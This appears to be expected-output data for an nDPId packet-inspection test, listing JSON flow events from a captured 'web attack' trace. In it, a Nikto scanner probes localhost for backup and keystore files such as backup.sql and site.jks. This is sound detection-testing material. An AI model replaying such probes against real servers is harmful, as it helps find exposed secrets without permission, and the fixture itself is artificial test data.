+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276965,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276966,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1576420276966,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276966,"pkt":"AAAAAAAAAAAAAAAACABFAAC9ujdAAEAGggF\/AAABfwAAAcMEH5BKt4Jt+wc3pIAYAED+sQAAAQEICp1m\/A6dZvwOR0VUIC8xLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276966,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276966,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276968,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1576420276968,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276968,"pkt":"AAAAAAAAAAAAAAAACABFAADA8BJAAEAGTCN\/AAABfwAAAcMGH5DhJMhLysCuKoAYAED+tAAAAQEICp1m\/BCdZvwPR0VUIC8xMjcwLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276968,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276968,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276969,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1576420276969,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276969,"pkt":"AAAAAAAAAAAAAAAACABFAADA1ehAAEAGZk1\/AAABfwAAAcMIH5C08u29Z4prKYAYAED+tAAAAQEICp1m\/BGdZvwRR0VUIC8xMjcwLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276969,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276969,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276970,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1576420276970,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276970,"pkt":"AAAAAAAAAAAAAAAACABFAADCS3NAAEAG8MB\/AAABfwAAAcMKH5AxI3MswmM4CYAYAED+tgAAAQEICp1m\/BKdZvwSR0VUIC9iYWNrdXAuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276970,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276970,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1576420276972,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276972,"pkt":"AAAAAAAAAAAAAAAACABFAADCyadAAEAGcox\/AAABfwAAAcMMH5BpA\/H\/vohuZIAYAED+tgAAAQEICp1m\/BSdZvwUR0VUIC9iYWNrdXAuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276973,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1576420276973,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276973,"pkt":"AAAAAAAAAAAAAAAACABFAADA+8hAAEAGQG1\/AAABfwAAAcMOH5CJ5sOeTDtcfYAYAED+tAAAAQEICp1m\/BWdZvwVR0VUIC9zaXRlLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276973,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276973,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1576420276976,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276976,"pkt":"AAAAAAAAAAAAAAAACABFAADABYdAAEAGNq9\/AAABfwAAAcMQH5AThT3a7QA3zYAYAED+tAAAAQEICp1m\/BidZvwYR0VUIC9zaXRlLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1576420276977,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276977,"pkt":"AAAAAAAAAAAAAAAACABFAADBYiVAAEAG2g9\/AAABfwAAAcMSH5B68lqAEiH3Y4AYAED+tQAAAQEICp1m\/BmdZvwZR0VUIC8xMjcuMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 